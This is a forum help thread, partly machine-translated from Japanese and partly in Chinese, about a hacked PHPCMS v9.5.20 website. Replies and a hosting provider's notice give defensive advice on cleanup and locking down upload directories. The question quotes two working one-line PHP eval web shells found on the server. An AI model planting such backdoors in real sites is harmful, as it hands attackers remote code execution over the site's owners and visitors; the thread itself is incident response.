最近 Web サイトが頻繁にハッカー攻撃を受けているため、できるだけ早く抜け穴を見つけて懸念を解決できるよう、考え方を明確にするために PHP の専門家の協力を求めています。
このインシデントは次のように説明されています:
1. Web サイトは、デフォルト バージョンの PHPCMS_V9_5.20 を使用して構築されています。
2. すべてのファイルは、最初は完全にオープンなアクセス許可でサーバーのルート ディレクトリに保存されます。
3. その後、Web サイトがハッキングされ、エントリー ファイル api.php とindex.php が書き換えられました。
4. 埋め込まれたウイルス ファイルは「One Sentence Trojan」です。内容は次のとおりです:
<?php @eval($_POST['dcs-19']);?>
<?php
5. が見つかりました。問題が発生した場合は、削除した後、そのようなファイルのアクセス許可をロックし、これで問題が解決すると考えてください。しかし、数日後、Web サイトのスナップショットが乗っ取られていたことが判明したため、再度確認してトロイの木馬を駆除したところ、トロイの木馬ファイルの場所はサーバーのルート ディレクトリの Uploadfile20170527 フォルダにあったことがわかりました。このファイルは、添付ファイルをアップロードしたり、バックグラウンドで記事を更新したりするときに、日付に基づいて自動的に作成されます。しかし、記事は5月27日に更新されなかったが、Webサイトの問題の根本原因を調査するために専門家に協力を求める内容が掲載された。
トロイの木馬の内容は次のとおりです:
<?php eval($_POST[1]);?>
ok
添付: インターネットで関連コンテンツを検索したところ、Web サイトのプログラムの脆弱性による SQL インジェクション攻撃であることが多く、脆弱性の修正を求められましたが、どうやって修正すればよいのでしょうか? PHP バージョンをオンラインでアップグレードすると便利ですか?
[技術的には初心者なので、わからないこともたくさんありますが、わからないことがあれば、質問欄で補足させていただきますので、ご安心ください! ]
这句话代码原理很简单,POST指的是客户端传送过去的数据,eval表示将这些数据当成代码执行。
对于黑客来说就是只需要在你网页上的对话框输入代码,提交以后就会被实际执行。
这只是表征,也就是最后留下的后门,但是黑客如何进来留后门的,那可能性就太多了,说不定上传功能有漏洞,ftp密码被破,管理员权限被获取,等等。最后留下这句木马只是下次使用方便而已。
最起码的需要做的,是整套代码下载下来,遍历一遍所有代码,查到所有 eval 相关的地方,如非本身程序必须,全部处理掉,不然你这边删一个,人家在别的地方重新上传一个,没完没了了。第二就是堵住系统管理漏洞,服务器各项组件能更新的就更新,所有密码全都改掉使用随机强密码,然后在服务器装个杀毒软件,我记得以前用过 Linux 服务器一个开源的。。忘了名字你搜索下就好。
最后,实在不行就交给专业的人处理,看投资值不值得了,我记得外国有网站是提供木马查杀,变动监控服务的,好像一两百美金一年,挺贵。国内不知道有没有相同的服务。
关于PHPCMS漏洞的通知
尊敬的用户:
您好!
今年四月份PHPCMS程序被曝出的最新漏洞,可以通过修改会员注册参数向网站注入PHP木马文件。通过我司测试发现,注册会员时,PHPCMS会将注册信息进行加密,然后再传递到服务器上进行会员注册操作,由于加密方式暂时无法破解,因此我司无法通过匹配对应的关键词来拦截黑客入侵;
目前解决方案有三种:
升级到最新的PHPCMS程序;
关闭网站上的会员注册功能;
取消uploadfile目录的执行权限(此方法可以避免木马执行,但无法避免木马文件上传);
执行上述任一方案后,请彻底检查uploadfile目录及子目录,是否含有PHP文件,此目录为上传图片的图片保存目录,如果发现存在PHP文件,则一定为木马文件!请及时删除!
景安网络
2017.6.19
换服务器密码,换SSH默认端口,能换服务器换个服务器。换PHPCMS,5,6年前都停止更新了。肯定漏洞不少。
权限问题
,你的上传目录开了可执行权限。解决问题的方法么,排除PHPCMS的漏洞之外,你需要将所以外部文件(不是你自己写的或者框架的代码)目录的可执行权限去掉。
楼上两位回复:
你的上传目录开了可执行权限
、取消uploadfile目录的执行权限
这是什么意思?都取消目录执行权限了,目录都打不开,自己要上传图片都上传不了,那还行?